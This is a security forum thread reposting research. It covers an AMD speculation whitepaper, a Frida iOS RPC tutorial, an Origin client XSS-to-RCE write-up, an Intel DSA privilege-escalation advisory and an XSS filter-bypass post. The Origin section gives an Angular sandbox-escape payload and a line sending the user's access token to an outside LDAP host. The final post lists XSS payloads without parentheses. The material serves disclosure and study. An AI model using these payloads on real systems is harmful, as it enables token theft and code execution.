
Posts posted by Nytro

-

-

WHITE PAPER: SPECULATION BEHAVIOR IN AMD MICRO-ARCHITECTURES

INTRODUCTION

This document provides in-depth descriptions of AMD CPU micro-architecture and how it handles speculative execution in a variety of architectural scenarios. Unless otherwise specified, this document refers to the latest Family 17h processors, which include AMD’s Ryzen™ and EPYC™ processors. This document does not necessarily describe general micro-architectural principles that exist in all AMD microprocessors. AMD’s processor architecture includes hardware protection checks that AMD believes help AMD processors not be affected by many side-channel vulnerabilities. These checks happen in various speculation scenarios, including during TLB validation, architectural exception handling, loads, and floating point operations.

Source: https://www.amd.com/system/files/documents/security-whitepaper.pdf

-

0x04 Calling iOS Native Functions from Python Using Frida and RPC

Today we’ll learn how to use Frida’s



NativeFunctionin order to create and call iOS native functions from Python. We’ll then go one step further and use RPC to call the same (remote) iOS functions as if they were local Python functions.The initial inspiration for this blog post came from a funny tweet by @CodeColorist a while ago.

If you haven’t tried to run the mentioned line yet, please do it. Open the Frida REPL and type it:

```javascript
new NativeFunction(Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound'), 'void', ['int'])(1007)
```

Let’s Dissect the One-Liner

So, what’s actually happening here? The line is calling the AudioServicesPlaySystemSound function from the AudioToolbox framework.

The Audio Toolbox framework provides interfaces for recording, playback, and stream parsing. It includes System Sound Services, which provides a C interface for playing short sounds and for invoking vibration on iOS devices that support vibration.

In terms of Frida:

- a framework -> a module object

- a function -> a native function object for that method / export of that module

Now we can dissect and rewrite the JavaScript one-liner like this:

```javascript
var address = Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound');
var play_sound = new NativeFunction(address, 'void', ['int']);
play_sound(1007);
```

This now reveals each of the steps involved:

- get the absolute address of that export living inside a module

- create a native function object with the correct return value and input parameters

- call a native function using custom parameters
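As a point of comparison only, the same three steps can be reproduced outside Frida with Python's standard ctypes module. This is an analogy, not Frida code. It assumes a desktop Linux or macOS host whose C library exports abs(), and it does not touch iOS or AudioToolbox.

```python
import ctypes
import ctypes.util

# 1. Resolve the export and take its absolute address
#    (Frida analogue: Module.findExportByName(module, name)).
libc = ctypes.CDLL(ctypes.util.find_library("c"))
address = ctypes.cast(libc.abs, ctypes.c_void_p).value

# 2. Describe the signature: return type first, then argument types
#    (Frida analogue: new NativeFunction(address, 'int', ['int'])).
prototype = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)
native_abs = prototype(address)

# 3. Call the native function like a regular function.
result = native_abs(-1007)
print(hex(address), result)
```

Here CFUNCTYPE(restype, *argtypes) plays the role of NativeFunction's returnType/argTypes pair. In both tools, calling an address with the wrong signature can crash the process.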

Let’s explore and understand each of them.

Getting the Absolute Address of an Export

The function that we need is AudioServicesPlaySystemSound. This function is exported by the AudioToolbox module. You can optionally verify this as follows:

```
[iPhone::Telegram]-> Module.enumerateExportsSync('AudioToolbox')
...
{
    "address": "0x186cf4e88",
    "name": "AudioServicesPlaySystemSound",
    "type": "function"
},
{
    "address": "0x186cf4e70",
    "name": "AudioServicesPlaySystemSoundWithCompletion",
    "type": "function"
},
{
    "address": "0x186cf3f58",
    "name": "AudioServicesPlaySystemSoundWithOptions",
    "type": "function"
},
...
```

This is how to get the absolute address of that export via Module.findExportByName(moduleName, exportName), which is part of Frida’s Module API:

```javascript
var address = Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound');
```

As you might expect, it is the same address we saw above (0x186cf4e88). We use this method for convenience instead of calling Module.enumerateExportsSync and searching for the address manually.

Creating a Native Function

In order to call the native function at that address, we still have to create a native function object with Frida’s NativeFunction. It has the structure new NativeFunction(address, returnType, argTypes), where:

- address is the absolute address.

- returnType specifies the return type.

- argTypes is an array specifying the argument types.

When playing around with Frida, I recommend always checking the APIs and examples at https://www.frida.re/docs/home/

We already have the address. It would help to have the signature of this function so we can get returnType and argTypes. No hacking is required for this. Just think like a developer who wants to use this method: where would you get the info? Yes, from the Apple docs:

```c
void AudioServicesPlaySystemSound(SystemSoundID inSystemSoundID);
```

- It receives a SystemSoundID, which is a UInt32 -> ‘int’ or ‘uint32’ for Frida

- It returns void -> ‘void’ for Frida
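Deriving returnType and argTypes from a C prototype is mechanical once typedefs are resolved. The Python sketch below illustrates that step for simple one-line prototypes. Note that to_frida_types, the typedef table, and the type table are hypothetical helpers of our own and are not part of Frida. Pointer and struct parameters are deliberately out of scope.

```python
import re

# Hypothetical typedef table: Apple typedef -> underlying C type.
TYPEDEFS = {"SystemSoundID": "UInt32", "UInt32": "uint32_t"}

# C base type -> type string accepted by Frida's NativeFunction.
FRIDA_TYPES = {
    "void": "void",
    "int": "int",
    "unsigned int": "uint",
    "int32_t": "int32",
    "uint32_t": "uint32",
    "double": "double",
}

PROTOTYPE = re.compile(r"\s*(.+?)\s+\w+\s*\((.*)\)\s*;?\s*$")


def resolve(c_type):
    """Follow typedefs until a base type with a Frida equivalent is reached."""
    c_type = c_type.strip()
    while c_type in TYPEDEFS:
        c_type = TYPEDEFS[c_type]
    return FRIDA_TYPES[c_type]


def to_frida_types(prototype):
    """Turn 'ret name(type arg, ...);' into (returnType, argTypes)."""
    match = PROTOTYPE.match(prototype)
    if match is None:
        raise ValueError(f"unsupported prototype: {prototype!r}")
    ret, params = match.group(1), match.group(2).strip()
    arg_types = []
    if params and params != "void":
        for param in params.split(","):
            # Drop the trailing parameter name and keep only its type.
            arg_types.append(resolve(param.strip().rsplit(" ", 1)[0]))
    return resolve(ret), arg_types


print(to_frida_types("void AudioServicesPlaySystemSound(SystemSoundID inSystemSoundID);"))
# ('void', ['uint32'])
```

The helper picks the exact-width 'uint32'. As the list above notes, 'int' also works for small IDs such as 1007, because both are 32-bit types on iOS.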

And that’s how we come up with:

```javascript
var play_sound = new NativeFunction(address, 'void', ['int']);
```

Remember that in a NativeFunction, parameter 2 is the return value type and parameter 3 is an array of input types.

Calling a Native Function

At this point our NativeFunction is stored in the play_sound variable. Call it just like a regular function, play_sound(), and remember to pass the (int) input parameter: play_sound(1007).

Putting it all together:

```javascript
var address = Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound');
var play_sound = new NativeFunction(address, 'void', ['int']);
play_sound(1007);
```

We can refactor those lines as:

```javascript
var play_sound = new NativeFunction(Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound'), 'void', ['int']);
play_sound(1007);
```

which is also equivalent to:

```javascript
new NativeFunction(Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound'), 'void', ['int'])(1007);
```

Now we’re back where we started.

Let’s play some more music

A quick search reveals more codes that we can use to play more sounds: http://iphonedevwiki.net/index.php/AudioServices

The audio files are stored in /System/Library/Audio/UISounds/:

```
iPhone:~ root# ls /System/Library/Audio/UISounds/
ReceivedMessage.caf
RingerChanged.caf
SIMToolkitSMS.caf
SentMessage.caf
Swish.caf
Tink.caf
...
```

Simply downloading the files and playing them would be too boring. Instead, we will use the previous one-liner to build a little Frida script (audiobox.js):

```javascript
// audiobox.js
console.log('Tags: sms, email, lock, photo');

function play(tag) {
    switch (tag) {
        case 'sms':
            _play(1007);
            break;
        case 'email':
            _play(1000);
            break;
        case 'lock':
            _play(1100);
            break;
        case 'photo':
            _play(1108);
            break;
    }
}

function _play(code) {
    new NativeFunction(Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound'), 'void', ['int'])(code);
}
```

Once we load it into the Frida REPL with

```
frida -U Telegram -l audiobox.js
```

we can simply call play('sms'), play('lock'), etc. to play all the available sounds.

Note: We will be attaching to Telegram for our examples. The target app doesn’t actually matter in this case, because the functions we will be calling are all system functions. If you’re working with native functions of a specific app, you should attach to that app instead.
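The switch in audiobox.js is just a lookup from tag to SystemSoundID, and it silently ignores unknown tags. A table-driven version of the same mapping makes the set of tags explicit and fails loudly on typos. It is sketched here in Python for illustration, and the SOUND_IDS and sound_id names are our own. Inside a Frida script, the equivalent would be a JavaScript object literal.

```python
# Tag -> SystemSoundID, using the same codes as audiobox.js.
SOUND_IDS = {"sms": 1007, "email": 1000, "lock": 1100, "photo": 1108}


def sound_id(tag):
    """Return the SystemSoundID for a tag, rejecting unknown tags."""
    try:
        return SOUND_IDS[tag]
    except KeyError:
        raise ValueError(f"unknown tag {tag!r}; expected one of {sorted(SOUND_IDS)}") from None


print("Tags:", ", ".join(SOUND_IDS))
```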

Using Frida’s RPC

Frida allows calling functions via RPC, for example from Python. This means we can call the app’s methods as if they were Python methods! Isn’t that cool? We just have to rewrite our Frida script like this (audiobox_rpc.js):

```javascript
// audiobox_rpc.js
function _play(code) {
    new NativeFunction(Module.findExportByName('AudioToolbox', 'AudioServicesPlaySystemSound'), 'void', ['int'])(code);
}

rpc.exports = {
    sms: function () { return _play(1007); },
    email: function () { return _play(1000); },
    lock: function () { return _play(1100); },
    photo: function () { return _play(1108); },
};
```

Then we write a Python script that does the following:

- attach to the target app on the connected USB device

- read the Frida script from file

- assign the script to the session

- start (load) the script

- access all RPC methods offered by the script

- detach and close the session

This is the Python code (frida_rpc_player.py):

```python
# frida_rpc_player.py
import codecs
import frida
from time import sleep

session = frida.get_usb_device().attach('Telegram')

with codecs.open('./audiobox_rpc.js', 'r', 'utf-8') as f:
    source = f.read()

script = session.create_script(source)
script.load()

rpc = script.exports
rpc.sms()
sleep(1)
rpc.email()
sleep(1)
rpc.lock()
sleep(1)
rpc.photo()

session.detach()
```

You can run it from the terminal by typing:

```
python3 frida_rpc_player.py
```
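The fixed rpc.sms(); sleep(1); ... sequence can be generalised into a loop over export names. The sketch below assumes exports is Frida's script.exports proxy. Any object that exposes the exported functions as attributes works the same way, which also makes the helper easy to exercise without a device. Note that play_sequence is a hypothetical helper and not part of Frida.

```python
import time


def play_sequence(exports, names, delay=1.0, sleep=time.sleep):
    """Call each named RPC export in order, pausing `delay` seconds between calls.

    `exports` is assumed to behave like Frida's script.exports proxy: each
    exported function is reachable as an attribute and is called with no args.
    """
    results = []
    for index, name in enumerate(names):
        if index:
            sleep(delay)  # pause between calls, not before the first one
        results.append(getattr(exports, name)())
    return results
```

With the script from above loaded, play_sequence(script.exports, ['sms', 'email', 'lock', 'photo']) reproduces the four calls. Passing sleep in as a parameter lets tests replace the real delay.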

Note: I’ve added an extra function to the Frida script that shows an alert whenever the audio is being played. To keep it simple, I won’t go into detail here, but I definitely recommend taking a look at the audiobox_rpc_alert.js script and analyzing all the steps. There you’ll see how to trigger and dismiss the alerts automatically.

That was actually easy, right? But I know you’ll say: “cool, I can now easily annoy everyone at home and at cafés making them think they’re getting messages but, what else?”

This technique might come in handy when you’re testing an app and trying to crack some code, or when you want the app to do tasks for you. For example, if the app does some encryption/decryption and implements crypto correctly, extracting the encryption keys should be virtually impossible, because they will be properly secured in the Secure Enclave. But think about it: why make the effort of extracting keys and replicating the encryption algorithm yourself when the app already offers an encrypt()/decrypt() function?

And remember, this is not specific to NativeFunctions. You can use any Frida code you like via RPC. For example, you can wrap any Objective-C method and serve it the same way. Here is a Frida script (openurl_rpc.js) that calls this function from my previous post:

```javascript
// openurl_rpc.js
function openURL(url) {
    var UIApplication = ObjC.classes.UIApplication.sharedApplication();
    var toOpen = ObjC.classes.NSURL.URLWithString_(url);
    return UIApplication.openURL_(toOpen);
}

rpc.exports = {
    openurl: function (url) {
        send('called openurl: ' + url);
        // Return the result so the Python side receives true/false.
        return openURL(url);
    }
};
```

Now you can do this from Python (see frida_rpc_openurl.py):

```python
# frida_rpc_openurl.py
import codecs
import frida

session = frida.get_usb_device().attach('Telegram')

with codecs.open('./openurl_rpc.js', 'r', 'utf-8') as f:
    source = f.read()

script = session.create_script(source)
script.load()

open_twitter_about = script.exports.openurl("https://twitter.com/about")
print(f'Result: {open_twitter_about}')  # Will show True/False

session.detach()
```

Using the returned value we can decide on how to continue. As you can see, it is up to your imagination and creativity.

Final Comments

This concrete example of playing some iOS system sounds has no real-life use, except perhaps annoying some people. However, the underlying technique should help you solve challenges you might encounter when analyzing apps.

While learning, deep understanding is key. Copying scripts and/or one-liners that you find on the internet might help you in the very short term, but it won’t help you in the long term. I hope that, as always, you have learned something new today.

If you have comments, feedback or questions feel free to reach me on Twitter

-

In this presentation titled What The Shellcode, Billy Meyers (@_hAxel) gives a quick primer on Assembly language and then goes over some quick analysis of shellcode for x86 Linux. XOR ECX is a bimonthly mini-conference hosted by XOR Security. Its name combines the company name with ECX, the general purpose counter register in Assembly language. The first event, XOR ECX, 0x00, was held in January 2019. XOR ECX gives security professionals an opportunity to share information with their peers. It also lets them practice, in front of a smaller audience, a talk they may be preparing for a larger conference such as ShmooCon or DEFCON. After the presentation wraps up, other activities such as a Capture the Flag (CTF) or Splunk Boss of the SOC (BOTS) are held.

- Billy's blog: https://www.haxel.io/

- Billy's Twitter: https://twitter.com/_hAxel

- XOR Security's site: https://www.xorsecurity.com/

-

A Questionable Journey From XSS to RCE

Introduction

As many of you reading this probably already know, in mid April, a good friend of mine (@Daley) and I located a Remote Code Execution vulnerability in EA’s Origin client (CVE-2019-11354). Today I’m going to go in depth on how we discovered this vulnerability, along with a couple others we needed to chain along the way ;pp

Debugging Origin

A lot of what was discovered was enabled by QtWebEngine debugging. By passing a specific flag to the origin process, we can hook Chrome devtools to the process and inspect the web view.

In order to set up remote debugging, you have to enable port forwarding in the Chrome devtools. To do this, start Chrome and open the devtools. From there, open the Remote Devices view, enable port forwarding, and fill in the settings as needed.

Now we can start the origin process.

```
Origin.exe --remote-debugging-port=31337
```

If you navigate to localhost:31337 in Chrome, you’ll be met with the devtools, and from there you can do all the poking around you need.
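A Chromium remote debugging port normally also serves a JSON list of debuggable targets over plain HTTP (the /json/list endpoint of the Chrome DevTools Protocol). Assuming Origin's QtWebEngine exposes the same endpoint on port 31337 (we have not verified this against Origin itself), a short Python script can list the pages without opening the devtools UI. Note that list_targets and parse_targets are our own helper names.

```python
import json
import urllib.request


def parse_targets(raw_json):
    """Keep page targets and the fields needed to attach a debugger to them."""
    return [
        {
            "title": target.get("title", ""),
            "url": target.get("url", ""),
            "ws": target.get("webSocketDebuggerUrl"),
        }
        for target in json.loads(raw_json)
        if target.get("type") == "page"
    ]


def list_targets(port=31337, host="127.0.0.1"):
    """Fetch the DevTools target list from a local remote-debugging port."""
    url = f"http://{host}:{port}/json/list"
    with urllib.request.urlopen(url, timeout=5) as response:
        return parse_targets(response.read().decode("utf-8"))
```

Usage, with Origin running as above: for t in list_targets(): print(t['title'], t['url']). Each ws value is a WebSocket URL that any DevTools Protocol client could connect to.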

Origin URI Handler

URI exploitation isn’t new by any means. For a long time it has provided reliable ways of delivering payloads and executing commands on remote computers. The idea of being able to execute remote commands by simply having your target visit a web-page is obviously more than ideal to any threat actor.

In this scenario, the whole idea behind registering a custom URI handler is for ease-of-access. For example, Origin’s handler is mainly there to be able to launch or purchase games from your web-browser. As soon as you click one of those links, your Origin client will launch with the parameters supplied by the crafted URI.

The Origin URI provides us with a few options we can use. To launch a game, we can use the following URI. This option gives us a few parameters. That’s where we’ll find our first bug.

```
origin://game/launch/?offerIds=OFFERID
```

The First Bug (Template Injection)

The first bug relies on the fact that when Origin receives an invalid game ID, it gives you the option to manually add it to your game library. The dialog that pops up also echoes the title of the game you’d like to add. You may be asking: if Origin doesn’t recognize the game, how does it fetch a title? That’s where the “title” parameter comes in handy.
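Because the title is just another query parameter, test links can be generated programmatically. The minimal Python sketch below uses urllib.parse. Note that build_launch_uri is a hypothetical helper. Percent-encoding the value is our own precaution: the links in this post are written unencoded, and we have not checked how Origin decodes them.

```python
from urllib.parse import urlencode


def build_launch_uri(offer_id, title):
    """Build an origin://game/launch link carrying an arbitrary, percent-encoded title."""
    return "origin://game/launch/?" + urlencode({"offerIds": offer_id, "title": title})


print(build_launch_uri("0", "zer0pwn"))
```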

We can quite literally specify any title we want by simply using the following link:

```
origin://game/launch/?offerIds=0&title=zer0pwn
```

This initially prompted me to try injecting HTML to see whether XSS might be possible. You can tell that the HTML is being interpreted when you use the following link:

```
origin://game/launch/?offerIds=0&title=<h1>zer0pwn
```

I figured it would be as simple as injecting script tags to execute JavaScript, but this was not the case. After a little digging, I discovered that the front-end is primarily developed in Angular. Angular does a lot with templating, so I figured template injection might be possible. Sure enough, a simple payload of {{7*7}} got evaluated:

```
origin://game/launch/?offerIds=0&title={{7*7}}
```

The Second Bug (XSS)

Obviously with a client-side template injection vulnerability, we’re limited to executing actions on the client. However, we can leverage this to evaluate our own Javascript and potentially compromise user sessions.
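A toy model shows why {{7*7}} came back as 49: untrusted input becomes part of the template before the template engine interpolates it. The Python below is a deliberately tiny stand-in and is not Angular. It only evaluates arithmetic (via ast), and the dialog text and function names are hypothetical.

```python
import ast
import operator
import re

# Only + - * / on numbers: enough to show {{7*7}} being evaluated.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _evaluate(node):
    if isinstance(node, ast.Expression):
        return _evaluate(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_evaluate(node.left), _evaluate(node.right))
    raise ValueError("unsupported expression")


def render(template):
    """Toy template engine: replace every {{ expr }} with its arithmetic value."""
    return re.sub(
        r"\{\{(.*?)\}\}",
        lambda m: str(_evaluate(ast.parse(m.group(1).strip(), mode="eval"))),
        template,
    )


def vulnerable_dialog(title):
    # The untrusted title is concatenated into the template *before* rendering,
    # so any {{...}} it contains gets evaluated: template injection.
    return render("Add " + title + " to your library?")


def safe_dialog(title):
    # Render the fixed template first, then insert the title as plain text.
    return render("Add {title} to your library?").format(title=title)
```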

Angular is notorious for sandboxing, which means that we’re going to have to do some funky scripting in order to execute what we want. Thankfully some researchers have already compiled a gist of Angular sandbox-escapes, which is what we used.

By using the following payload in the title param, we were able to pop an alert box (l33th4x!!!!11)

```
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(l),a')}}
```

The Third Bug (RCE)

Now, this part of the exploit is relatively trivial. QDesktopServices itself isn’t necessarily vulnerable here. However, the way Origin implemented it, combined with the other vulnerabilities, produced a pretty nasty result.

According to the Qt documentation, “The QDesktopServices class provides methods for accessing common desktop services. Many desktop environments provide services that can be used by applications to perform common tasks, such as opening a web page, in a way that is both consistent and takes into account the user’s application preferences.”

Now here’s the crazy part… There is actually an SDK (by Origin) in which you can communicate with the client’s QDesktopServices via a javascript library. This only works if it’s launched within the Origin client (obviously).

By accessing Origin.client.desktopServices in the DOM, we can find the following functions:

```
: function asyncOpenUrl()
: function asyncOpenUrlWithEADPSSO()
: function deminiaturize()
: function flashIcon()
: function formatBytes()
: function getVolumeDiskSpace()
: function isMiniaturized()
: function miniaturize()
: function moveWindowToForeground()
: function setNextWindowUUID()
: function showWindow()
```

Some of these functions are pretty cool. If you call flashIcon(), you’ll see the Origin icon flashing (big surprise, right). Most of the functions are pretty self-explanatory, so I won’t bother going into them.

What we had luck with was asyncOpenUrl(). This function basically calls the QDesktopServices openUrl() function, which in turn opens a web browser or whatever application is registered for the provided URI. According to the documentation, you can also load local resources. Sounds promising, right ;)? We can literally open a calculator with the following JavaScript:

```javascript
Origin.client.desktopServices.asyncOpenUrl("calc.exe")
```

What else can we do?

As I mentioned earlier, Origin has a CSP in place, which makes exfiltration somewhat difficult. If we use the ldap:// URI handler in conjunction with asyncOpenUrl(), we can send an LDAP request along with the data we want to exfiltrate:

```javascript
"ldap://safe.tld/o="+Origin.user.accessToken()+",c=UnderDog"
```

On the server, start tcpdump and set the necessary filters, and you should see the data being transmitted in plaintext.

The Origin.user object contains a bunch of other information as well:

```
: function accessToken()
: function country()
: function dob()
: function email()
: function emailStatus()
: function globalEmailSignup()
: function isAccessTokenExpired()
: function originId()
: function personaId()
: function registrationDate()
: function sessionGUID()
: function showPersona()
: function tfaSignup()
: function underAge()
: function userGUID()
: function userPid()
: userStatus()
```

Wasn’t this patched?

Electronic Arts rolled out a patch, but bypasses are available, as some on Twitter have decided to share. This highlights the issue once again. It should be addressed by sanitizing all types of input, which the initial patch failed to do.
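Besides escaping the title, sanitizing input in this chain could also mean that a desktop bridge like asyncOpenUrl() refuses anything other than an expected web URL before passing it to QDesktopServices openUrl(). Below is a Python sketch of such an allow-list check. It is an illustration, not EA's actual fix, and the allowed scheme and host are placeholders.

```python
from urllib.parse import urlsplit

# Hypothetical policy: only HTTPS links to hosts the client expects.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"www.origin.com"}


def is_safe_to_open(url):
    """Return True only for https:// URLs whose host is explicitly allowed."""
    parts = urlsplit(url.strip())
    return parts.scheme.lower() in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS


for candidate in ("calc.exe", "ldap://safe.tld/o=token,c=UnderDog", "https://www.origin.com/store"):
    print(candidate, is_safe_to_open(candidate))
```

An allow-list is used rather than a block-list because schemes such as ldap:// or file:// are easy to overlook when enumerating what to forbid.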


-

Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation

- Vendor: Intel

- Vendor URL: http://www.intel.com/

- Versions affected: Intel Driver Support & Assistance prior to version 19.4.18

- Systems Affected: Microsoft Windows

- Author: Richard Warren <richard.warren[at]nccgroup[dot]com>

- Advisory URL / CVE Identifier: CVE-2019-11114

- Risk: Medium

Summary

This vulnerability allows a low privileged user to escalate their privileges to SYSTEM.

Location

Intel Driver Support & Assistance - DSAService (DSACore.dll)

Impact

Upon successful exploitation, arbitrary file read and write as SYSTEM is achieved, leading to local privilege escalation.

Details

The Intel Driver & Support Assistant software, which allows users to update their drivers and software on Intel-based machines, suffers from a number of logic-based issues. These result in both arbitrary file read and arbitrary file write as SYSTEM. A low-privileged local attacker can exploit them to achieve local privilege escalation.

The Intel Driver & Support Assistant (DSA) software service (DSAService) runs under the highly privileged SYSTEM account. DSAService runs an HTTP REST server on a TCP port between 28380-28384 (for HTTPS) or 28385-28389 (for HTTP), so that the web browser can communicate with the DSA service when carrying out updates. DSA also contains a component called DSATray, which runs as a low-privileged child process of DSAService. DSATray allows the user to change certain settings within DSA, such as the logging and downloads directories. These specify where DSAService will store its log files and where DSA will download driver installers. In order for the low-privileged DSATray process to communicate these settings to the higher-privileged service, DSAService exposes a WCF service over a named-pipe instance. This named pipe does not require any privileges to read or write to, as shown below:

```
>pipelist.exe

PipeList v1.02 - Lists open named pipes
Copyright (C) 2005-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Pipe Name                                  Instances    Max Instances
---------                                  ---------    -------------
--SNIP--
7adb97bb-ffbe-468a-8859-6b3b63f7e418       8            -1

>accesschk.exe \pipe\7adb97bb-ffbe-468a-8859-6b3b63f7e418

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\Pipe\7adb97bb-ffbe-468a-8859-6b3b63f7e418
  RW Everyone
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
```

The log folder can be reconfigured by a low privileged user, either via the DSATray GUI itself, or via the SetLogDirectory WCF method.

Under normal circumstances, the DSA log files are not writeable by a low privileged user (as shown below), however as a low privileged user can set a custom log directory, these permissions can be bypassed by modifying the log directory setting.

```
>accesschk.exe C:\ProgramData\Intel\DSA\

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\ProgramData\Intel\DSA\Service.log
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  BUILTIN\Users
C:\ProgramData\Intel\DSA\Service.log.bak
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  BUILTIN\Users
C:\ProgramData\Intel\DSA\Tray.log
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  RW DESKTOP-HOHGEL9\bob
  R  BUILTIN\Users
C:\ProgramData\Intel\DSA\UpdateService.log
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  BUILTIN\Users
```
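When triaging many objects, it helps to filter accesschk's text output for objects that broad groups can write. Below is a rough Python sketch that assumes accesschk's plain layout: each object path on its own line, followed by indented lines such as RW Everyone. The function name and the list of "broad" principals are our own choices.

```python
BROAD_PRINCIPALS = ("Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users")


def writable_by_broad_groups(output, principals=BROAD_PRINCIPALS):
    """Map each object in accesschk output to the broad principals that can write it."""
    findings = {}
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            # Object path (banner and command lines land here too, harmlessly).
            current = line.strip()
            continue
        access, _, who = line.strip().partition(" ")
        who = who.strip()
        if current and "W" in access and who in principals:
            findings.setdefault(current, []).append(who)
    return findings
```

Applied to the named-pipe listing, this would flag the pipe for Everyone. None of the default log files in the directory listing are writable by these groups, since Tray.log grants write access only to the specific user bob.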

Finally, in vulnerable versions the DSAService does not impersonate the logged-on user before writing to the log file(s), nor does it check whether the log directory contains Symbolic links. If an attacker configures the log folder to a writeable directory, then they can use a symlink/mount point/hardlink to read or write arbitrary files. Combined with log poisoning this can lead to local privilege escalation.

Arbitrary file read can be achieved by creating a hard link from Detailed-System-Report.html to the file the attacker wishes to read, and then calling the “report/save” REST method on the DSAService local REST server. The content of the target file will be returned within the HTTP response.

Arbitrary file write can be achieved by creating a Symlink Chain (using James Forshaw’s CreateSymlink.exe tool), pointing the System.log file to a file of the attacker’s choice, switching the log directory and subsequently sending any arbitrary content to the DSAService local REST server. Any content sent within the POST request will be logged verbosely to the System.log file. Combined with other vectors this can result in code execution as SYSTEM.

NCC Group provided a proof of concept exploit demonstrating the above vulnerability to Intel on the 23rd of April 2019.

Intel released DSA version 19.4.18 on May 15th 2019. This updated version of the software adds a number of new checks:

- DSACore!GenerateHtmlReport now checks whether the file is a Symbolic/Hardlink.

- A new check is added to DSACore!IsValidDirectory which is called when the log directory is set.
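The idea behind the link checks is to refuse to follow a report or log path that is a symbolic link or that has extra hard links. This can be sketched with Python's os.lstat. The code below illustrates the general technique and is not Intel's code. It inspects only the final path component, so directory junctions or mount points (also used in this attack) would need separate handling. A check-then-write sequence is also racy, so impersonating the caller before touching user-controlled paths remains the more robust fix.

```python
import os
import stat


def safe_to_write(path):
    """Refuse paths that are symlinks, non-regular files, or files with extra hard links."""
    try:
        info = os.lstat(path)  # lstat does not follow a final symbolic link
    except FileNotFoundError:
        return True  # nothing there yet; the caller would create a fresh file
    if stat.S_ISLNK(info.st_mode):
        return False  # symbolic link
    if not stat.S_ISREG(info.st_mode):
        return False  # directory, device, pipe, ...
    return info.st_nlink == 1  # more than one link: another name shares this data
```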

Recommendation

Upgrade to Intel DSA version 19.4.18 or newer.

Vendor Communication

- April 23, 2019: Vulnerability disclosed to Intel

- April 23, 2019: Confirmation of receipt from Intel

- April 30, 2019: Intel confirmed the issue was reproduced and that they were working on a fix

- May 14, 2019: Intel released DSA version 19.4.18, addressing the reported issue

- May 14, 2019: Checked with Intel that CVE-2019-11114 definitely correlates to the reported LPE vulnerability

- May 14, 2019: Intel confirmed CVE-2019-11114 is the correct CVE for the reported issue

- May 15, 2019: NCC Group advisory released

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 15 May 2019

Written by: Richard Warren

-

XSS without parentheses and semi-colons



Gareth Heyes | 15 May 2019 at 14:54 UTC

A few years ago I discovered a technique to call functions in JavaScript without parentheses, using onerror and the throw statement. It works by setting the onerror handler to the function you want to call, and using the throw statement to pass the argument to that function:

```html
<script>onerror=alert;throw 1337</script>
```

The onerror handler is called every time an uncaught JavaScript exception is thrown. The throw statement allows you to create a custom exception containing an expression, which is sent to the onerror handler. Because throw is a statement, you usually need to follow the onerror assignment with a semi-colon to begin a new statement rather than form an expression.

I encountered a site that was filtering parentheses and semi-colons, and I thought it must be possible to adapt this technique to execute a function without a semi-colon. The first way is pretty straightforward: use curly braces to form a block statement that contains your onerror assignment. After the block statement you can use throw without a semi-colon (or new line):

```html
<script>{onerror=alert}throw 1337</script>
```

The block statement was good, but I wanted a cooler alternative. Because the throw statement accepts an expression, you can do the onerror assignment inside the throw statement itself. The last part of the expression is sent to the onerror handler, so the function will be called with the chosen arguments. Here's how it works:



```html
<script>throw onerror=alert,'some string',123,'haha'</script>
```

If you've tried running the code, you'll notice that Chrome prefixes the string sent to the exception handler with "Uncaught".

In my previous blog post I showed how it was possible to use eval as the exception handler and evaluate strings. To recap, you can prefix your string with an =. This turns the 'Uncaught' prefix into the target of an assignment, so the rest of the string executes as arbitrary JavaScript. For example:

```html
<script>{onerror=eval}throw'=alert\x281337\x29'</script>
```

The string sent to eval is "Uncaught=alert(1337)". This works fine on Chrome, but on Firefox the exception gets prefixed with the two-word string "uncaught exception", which of course causes a syntax error when evaluated. I started to look for ways around this.

It's worth noting that the onerror/throw trick won't work when executing a throw from the console. When the throw statement is executed in the console, the result is sent to the console instead of the exception handler.

When you use the Error function in Firefox to create an exception, it does not contain the "uncaught exception" prefix. Instead, it contains just the string "Error":

```javascript
throw new Error("My message")//Error: My message
```

I obviously couldn't call the Error function because it requires parentheses. I thought that using an object literal with the Error prototype might emulate the behaviour, but this didn't work: Firefox still prefixed it with the same string. I then used the Hackability Inspector to inspect the Error object and see what properties it had. I added all the properties to the object literal and it worked! By removing the properties one at a time, I found the minimal set required:

```html
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
```

You can use the fileName property to send a second argument on Firefox too:

```html
<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
```

